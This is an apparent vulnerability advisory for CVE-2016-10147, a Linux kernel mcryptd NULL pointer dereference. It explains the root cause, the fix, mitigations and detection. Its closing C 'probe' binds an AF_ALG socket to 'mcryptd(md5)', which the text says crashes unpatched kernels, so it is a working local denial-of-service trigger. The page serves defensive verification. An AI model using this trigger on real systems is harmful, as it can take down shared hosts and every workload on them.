CVE-2016-10147 in Linux
Summary
by MITRE
crypto/mcryptd.c in the Linux kernel before 4.8.15 allows local users to cause a denial of service (NULL pointer dereference and system crash) by using an AF_ALG socket with an incompatible algorithm, as demonstrated by mcryptd(md5).
Analysis
by VulDB Data Team • 05/13/2026
CVE-2016-10147 is a NULL pointer dereference in the Linux kernel's crypto subsystem, in crypto/mcryptd.c. mcryptd is the multi-buffer crypto daemon: a template that wraps the x86-64 multi-buffer SHA implementations (sha1_mb, sha256_mb, sha512_mb) so that several hash requests can be batched and processed together. It is an internal helper for those drivers, not a general-purpose wrapper, and it was never meant to be instantiated around an arbitrary algorithm. Before 4.8.15 nothing enforced that, so a local user could ask the AF_ALG socket interface for "mcryptd(md5)" and have the template built around an algorithm it cannot drive, which ends in a NULL pointer dereference and a kernel oops. The impact is availability only: the report describes a crash, not a controllable dereference, so this should not be described as a privilege-escalation primitive. It does, however, need no privilege beyond the ability to create a socket, provided the kernel exposes the hash side of AF_ALG (CONFIG_CRYPTO_USER_API_HASH) and the mcryptd template is built in or loadable (CONFIG_CRYPTO_MCRYPTD).
The root cause is a missing compatibility check when the template is instantiated. The crypto API lets a caller request a template applied to an inner algorithm by name ("mcryptd(md5)"), and AF_ALG passes such a name straight through from user space when a program binds a hash socket. mcryptd_create_hash() in crypto/mcryptd.c looked the inner algorithm up and built the instance without confirming that it was one of the multi-buffer implementations mcryptd exists to serve. md5 is not, and using the resulting instance dereferences a NULL pointer and oopses the kernel. This is CWE-476 (NULL Pointer Dereference) with a missing-validation root cause: the code assumed the inner algorithm had been chosen by trusted in-kernel code rather than by whoever opened the socket.

The upstream fix, the commit titled "crypto: mcryptd - Check mcryptd algorithm compatibility" (shipped in 4.8.15 and carried by every later mainline kernel), does not inspect the algorithm name at all. The multi-buffer drivers request their mcryptd instances with CRYPTO_ALG_INTERNAL set in both the type and the mask they pass to the crypto API, whereas a request arriving through AF_ALG carries neither. mcryptd_check_internal() was changed to report whether the request asked for an internal algorithm, and mcryptd_create_hash() now returns -EINVAL when it did not, so a request that originates in user space can no longer instantiate the template at all, whatever inner algorithm it names.
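The following is an added example, not code from the kernel tree or from VulDB: a user-space model of the compatibility check described above, showing the pre-fix helper (which cannot refuse anything) beside the fixed one, driven with the two request shapes that matter. The CRYPTO_ALG_INTERNAL value is the kernel's; the function and struct names are this example's own, the struct layouts are simplified, and the inner driver name used for the in-kernel request is illustrative of a multi-buffer driver's request rather than copied from a specific source file.

```c
/*
 * Added example: user-space model of the CVE-2016-10147 fix in mcryptd_create_hash().
 * Not kernel code; names other than CRYPTO_ALG_INTERNAL are this example's own.
 */
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define CRYPTO_ALG_INTERNAL 0x00002000u   /* same value as include/linux/crypto.h */

/* The (type, mask) pair a caller hands to crypto_alloc_ahash() for a template name. */
struct alg_request {
    const char *name;   /* e.g. "mcryptd(md5)" */
    uint32_t type;
    uint32_t mask;
};

/*
 * Pre-fix behaviour: the helper only propagates the INTERNAL bits and returns
 * nothing, so the caller has no way to learn that they were absent and always
 * goes on to build the instance.
 */
static void check_internal_old(const struct alg_request *req, uint32_t *type, uint32_t *mask)
{
    if (req->type & CRYPTO_ALG_INTERNAL)
        *type |= CRYPTO_ALG_INTERNAL;
    if (req->mask & CRYPTO_ALG_INTERNAL)
        *mask |= CRYPTO_ALG_INTERNAL;
}

/* Fixed behaviour: same propagation, but report whether INTERNAL was actually requested. */
static bool check_internal_new(const struct alg_request *req, uint32_t *type, uint32_t *mask)
{
    *type |= req->type & CRYPTO_ALG_INTERNAL;
    *mask |= req->mask & CRYPTO_ALG_INTERNAL;
    return (*type & *mask & CRYPTO_ALG_INTERNAL) != 0;
}

/* Returns 0 when the mcryptd instance would be created, -EINVAL when it is refused. */
int mcryptd_create_hash_model(const struct alg_request *req, bool fixed)
{
    uint32_t type = 0, mask = 0;

    if (fixed) {
        if (!check_internal_new(req, &type, &mask))
            return -EINVAL;         /* the only change the fix needed */
    } else {
        check_internal_old(req, &type, &mask);
    }
    /* In the kernel the inner-algorithm lookup and instance construction follow here. */
    return 0;
}

/* What AF_ALG passes for a user-supplied name: no type bits, no mask bits. */
struct alg_request request_from_af_alg(const char *name)
{
    struct alg_request r = { name, 0, 0 };
    return r;
}

/* What an in-kernel multi-buffer driver passes: INTERNAL in both type and mask. */
struct alg_request request_from_mb_driver(const char *name)
{
    struct alg_request r = { name, CRYPTO_ALG_INTERNAL, CRYPTO_ALG_INTERNAL };
    return r;
}

int main(void)
{
    struct alg_request user = request_from_af_alg("mcryptd(md5)");
    struct alg_request kern = request_from_mb_driver("mcryptd(__sha1-mb)");  /* illustrative inner name */

    printf("unpatched, AF_ALG mcryptd(md5):   %d\n", mcryptd_create_hash_model(&user, false));
    printf("patched,   AF_ALG mcryptd(md5):   %d\n", mcryptd_create_hash_model(&user, true));
    printf("patched,   driver mcryptd(sha-mb): %d\n", mcryptd_create_hash_model(&kern, true));
    return 0;
}
```

The point the model makes is that the fix keys on who is asking, not on what they ask for: user space cannot set CRYPTO_ALG_INTERNAL through AF_ALG, so every AF_ALG request for an mcryptd instance is rejected, while the multi-buffer drivers, which always pass the flag, are unaffected.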
Operationally this is a reliable, repeatable local denial of service: any process that can call socket(AF_ALG, SOCK_SEQPACKET, 0) and bind() can take the machine down, and it needs no privilege to do so. The failure is a kernel oops rather than a contained error, so the blast radius is every workload on the host. That matters most on shared systems: multi-tenant build machines and CI runners, container hosts (AF_ALG is reachable from inside a container unless the runtime's seccomp profile blocks that address family) and any box that gives shells to untrusted users. Affected systems are those running a kernel before 4.8.15 (or a stable branch without the backport) with the AF_ALG hash interface enabled and the mcryptd template available. mcryptd is a module in most distribution kernels and is normally brought in by the x86-64 multi-buffer SHA drivers, but the crypto API also autoloads templates by name, so a request for "mcryptd(...)" through AF_ALG can pull the module in on demand even where nothing else uses it. In ATT&CK terms this is T1499.004, Endpoint Denial of Service: Application or System Exploitation. It is not a network denial of service (T1498 does not apply, since no network traffic is involved), and T1059.001, which covers PowerShell, has no bearing on a Linux kernel bug.
Mitigation is to run a kernel that contains the fix: 4.8.15 or later, or a distribution kernel whose changelog lists the backport of "crypto: mcryptd - Check mcryptd algorithm compatibility". Where the update has to wait, the exposure can be removed by keeping the template out of the kernel. Because the crypto API autoloads templates on request, a plain module blacklist is not enough on its own; an `install mcryptd /bin/false` line in /etc/modprobe.d/ refuses every load attempt, and since the multi-buffer SHA drivers depend on mcryptd they stop loading as well. The cost is the multi-buffer SHA fast path, which only matters for throughput on workloads that hash many buffers in parallel. Where no program on the host needs AF_ALG at all, a seccomp filter that rejects socket() calls with domain AF_ALG (value 38) closes the interface entirely, and for containers the runtime's seccomp profile can do the same. For detection, an audit rule on the socket syscall with a0=38 records every AF_ALG socket creation, which is rare on most systems and therefore easy to review, and a kernel oops whose backtrace contains mcryptd symbols is the signature of an actual trigger. Kernel lockdown and module-signing controls do not help here: the bug is reached through an ordinary socket, not through loading or modifying a module. The bug illustrates a recurring kernel pattern, an internal helper that trusts its callers becoming reachable from user space through a generic interface, and the fix is correspondingly to validate at the boundary rather than to special-case one algorithm. Organisations should treat kernel security updates as routine and automated, since the window between a public advisory and a working trigger for a bug like this is measured in minutes.
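As an added example, not from VulDB or the kernel tree, the following probe verifies that a kernel refuses the request named in the CVE description. It asks AF_ALG for "mcryptd(md5)" and reports the kernel's answer: a fixed kernel (or one without mcryptd at all) fails the bind(), whereas on an unpatched kernel this bind is the request that leads to the crash, so run it only on a disposable test system. socket(), bind() and the AF_ALG address layout are the real Linux interface (the struct below mirrors struct sockaddr_alg from linux/if_alg.h so the file also compiles where that header is absent); probe_af_alg() is this example's own helper.

```c
/*
 * Added example: probe whether this kernel will instantiate "mcryptd(md5)" for
 * user space.  Not code from VulDB or the kernel.  Run only on a test system:
 * on a kernel vulnerable to CVE-2016-10147 this is the crashing request.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef AF_ALG
#define AF_ALG 38                    /* Linux value; socket() fails with EAFNOSUPPORT elsewhere */
#endif

/* Same layout as struct sockaddr_alg in <linux/if_alg.h>; defined here to stay portable. */
struct alg_addr {
    uint16_t salg_family;
    uint8_t  salg_type[14];          /* "hash", "skcipher", ... */
    uint32_t salg_feat;
    uint32_t salg_mask;
    uint8_t  salg_name[64];          /* algorithm or template name, NUL-terminated */
};

/*
 * Returns 0 if the kernel instantiated the algorithm for us, otherwise the errno
 * of the failing call (EAFNOSUPPORT: no AF_ALG at all; ENOENT or similar: refused).
 */
int probe_af_alg(const char *alg_type, const char *alg_name)
{
    struct alg_addr sa;
    int fd, err = 0;

    fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (fd < 0)
        return errno;

    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    /* Both fields are fixed-size arrays; snprintf keeps them NUL-terminated. */
    snprintf((char *)sa.salg_type, sizeof(sa.salg_type), "%s", alg_type);
    snprintf((char *)sa.salg_name, sizeof(sa.salg_name), "%s", alg_name);

    if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0)
        err = errno;
    close(fd);
    return err;
}

/* Human-readable verdict for one probe result. */
const char *verdict(int rc, int expected_ok)
{
    if (rc == 0)
        return expected_ok ? "instantiated" : "INSTANTIATED (kernel is unpatched)";
    if (rc == EAFNOSUPPORT)
        return "AF_ALG not available";
    return "refused";
}

int main(void)
{
    int rc;

    /* Control: plain md5 works on any kernel with CONFIG_CRYPTO_USER_API_HASH. */
    rc = probe_af_alg("hash", "md5");
    printf("hash/md5:         %s (%s)\n", verdict(rc, 1), rc ? strerror(rc) : "ok");

    /* The CVE-2016-10147 request. A fixed kernel must refuse it. */
    rc = probe_af_alg("hash", "mcryptd(md5)");
    printf("hash/mcryptd(md5): %s (%s)\n", verdict(rc, 0), rc ? strerror(rc) : "ok");
    return 0;
}
```

The control probe separates "the fix is present" from "AF_ALG is simply unavailable": if md5 itself cannot be bound, the interface is missing or blocked by seccomp, and the mcryptd result says nothing about the patch level.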